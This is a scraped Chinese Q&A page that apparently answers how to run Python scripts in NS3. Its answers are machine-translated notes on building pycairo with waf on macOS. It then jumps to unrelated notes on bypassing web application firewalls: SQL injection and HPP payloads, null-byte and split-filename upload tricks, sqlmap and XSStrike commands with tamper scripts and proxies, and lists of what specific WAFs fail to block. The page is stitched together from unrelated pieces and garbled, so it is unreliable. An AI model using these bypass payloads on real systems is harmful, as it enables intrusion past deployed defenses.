ns3怎么运行python脚本

Python074

ns3怎么运行python脚本,第1张

在NS3下进行开发,需要将测试脚本放在scratch目录下,用waf进行编译。 编译命令为:sudo ./waf 运行程序命令为:sudo ./waf --run scratch/your_target_file 此时

1. 我认为WAF坏了用于Mac OS X:(

下面是它如何工作的之后python waf configure未能找到Python.h,我看着通过位于build_directory config.log文件,发现失败的真正为架构。 WAF的脚本试图建立一个简单的源文件中的i386架构的CPython调用。它没有这样做,我的python被建为x86_64架构。

我猜,你可以重建Python作为一个通用的二进制,我还没有试过。这是可能的,但是 CodeGo.net,打造x86_64架构。这里的如何。

我的设置:

$ python --version

Python 2.7.2

$ type python

python is /usr/local/bin/python

$ file /usr/local/bin/python

/usr/local/bin/python: Mach-O 64-bit executable x86_64

$ brew --version

0.8

Importrant:我的Python版本是专为在x86_64架构。请确保它也是执行下面描述的步骤之前,你的情况下。

冲泡代表你,而不是它的芬克或使用MacPorts,以便下面的步骤来为你工作。

现在,安装cairo和pycairo我做到以下几点:brew install cairo(版本1.10.2截至今天)

找pycairo来源Python 2.x的(如果你得到一个快照,它是py2cairo,而pycairo现在需要Python 3.x的)。从主分支源(提交f3435910d8f5365b45ebd4216f4043383c9e3e19)

开wscript在您选择的编辑器,找到该行env = ctx.env在函数configure并在它下面添加下面一行env.append_unique('CFLAGS', ['-arch', 'x86_64'])保存文件

在你的终端上运行:export CC=/usr/bin/gccexport PKG_CONFIG_PATH=/usr/local/Cellar/cairo/1.10.2/lib/pkgconfig/重要:后者路径将只为你,如果你通过安装cairo工作

然后运行在pycairo的INSTALL文件中描述:python waf configurepython waf buildpython waf install这应该这样做。如果它不为你工作,我认为这是更好地提高pycairo邮件列表上的主题(如果有的话)。

2.

对于后面这一点,我能得到py2cairo安装在OSX狮子一个稍微不同的方法,基于llimllib的链接。希望这会有所帮助:

python waf clean

export PYTHONPATH=/Library/Frameworks/Python.framework/Versions/2.7/

export LD_LIBRARY_PATH=/Library/Frameworks/Python.framework/Versions/2.7/:$LD_LIBRARY_PATH

export LD_LIBRARY_PATH=/Library/Frameworks/Python.framework/Versions/2.7/lib:$LD_LIBRARY_PATH

export LINKFLAGS='-search_dylibs_first -L /Library/Frameworks/Python.framework/Versions/2.7/lib/'

export ARCHFLAGS='-arch x86_64'

export CC=/usr/bin/gcc-4.2

export PKG_CONFIG_PATH=/usr/local/Cellar/cairo/1.10.2/lib/pkgconfig/

python waf configure --prefix=$PYTHONPATH

python waf build

python waf install

3.

android的步骤差不多的作品。

人们需要(从llimllib):export ARCHFLAGS='-arch x86_64在步骤5,然后python waf install可以

1、速度流量问题

2、工具的指纹被识别

3、工具的检测Poc或Payload

1、SQL注入&文件上传绕过

2、XSS跨站&其他漏洞绕过

3、HPP污染&垃圾数据&分块等

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html

关键字替换

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12

更换提交方式:

POST id=-1 union select 1,2,3--+

模拟文件上传 传递数据

分块传输:更改数据请求格式

https://github.com/c0ny1/chunked-coding-converter

HPP参数污染:id=1/* &id=-1%20union%20select%201,2,3%23 /

文件上传:换行解析&垃圾溢出&%00干扰&=符号干扰&参数模拟

filename=a.php

filename="a.php

filename="a.php%00"

垃圾数据filename="a.php"

无限filenamefilename="a.php"

filename=="a.php"

filename="name='uploadfile.php"

filename="Content-Disposition: form-data.php"

filename=="a.ph

p"

python sqlmap.py -u " http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2 " --random-agent --tamper= rdog.py --proxy=" http://tps118.kdlapi.com:15818 "

格式替换

https://github.com/s0md3v/XSStrike

python xsstrike.py -u " http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit " --proxy

txt= y)&submit=%E6%8F%90%E4%BA%A4

文件包含:没什么好说的就这几种

..\ ..../ ...\等

安全狗:

注入 xss 文件上传拦截

rce 文件包含 等其他不拦截

宝塔:

注入 上传拦截

rce 文件包含 xss等其他不拦截

其中拦截的是关键字

aliyun

拦截的CC速度 和 后门 信息收集和权限维持阶段拦截

漏洞利用 他不拦截 默认的版本(升级版本没测试)

WAF PHP环境 JAVA不支持